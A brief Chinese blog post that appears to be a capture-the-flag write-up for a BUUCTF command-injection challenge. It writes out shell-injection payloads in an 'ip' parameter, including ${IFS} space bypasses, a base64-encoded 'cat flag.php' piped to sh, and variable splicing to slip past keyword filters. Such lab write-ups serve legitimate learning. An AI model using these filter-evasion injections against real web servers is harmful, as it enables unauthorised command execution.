buuctf之命令执行web骚操作......持续更新
空格过滤常见ctfweb题目中
大佬的博客,持续学习学习学习https://www.ghtwf01.cn/index.php/archives/273/
通过学习知道怎么样绕过
以buuctf
首先使用burp抓包看看过滤了什么字符
基本上大部分字符都被过滤了,就很烦人
尝试构造?ip=127.0.0.1;ls
发现有两个东西
构造cat falg.php发现被过滤了,这怎么办???
flag被过滤,空格也被过滤
尝试%09发现不行
尝试nl%09*
发现被过滤了*
也就是说想要一键出flag不可能
上网查查过滤怎么办发现可以构造
${IFS}$1
尝试构造
?ip=127.0.0.1;nl${IFS}$1index.php
看到bash被过滤了
卧槽
但是sh没有被过滤,flag也没了
想想可以?ip=127.0.0.1;echo$IFS$1Y2F0IGZsYWcucGhw|base64$IFS$1-d|sh
base64解码
用sh在bash下大部分都能运行
或者
变量拼接↓
我们看到源码中有一个$a变量可以覆盖
?ip=127.0.0.1;a=g;cat$IFS$1fla$a.php
欢迎大佬的各种骚操作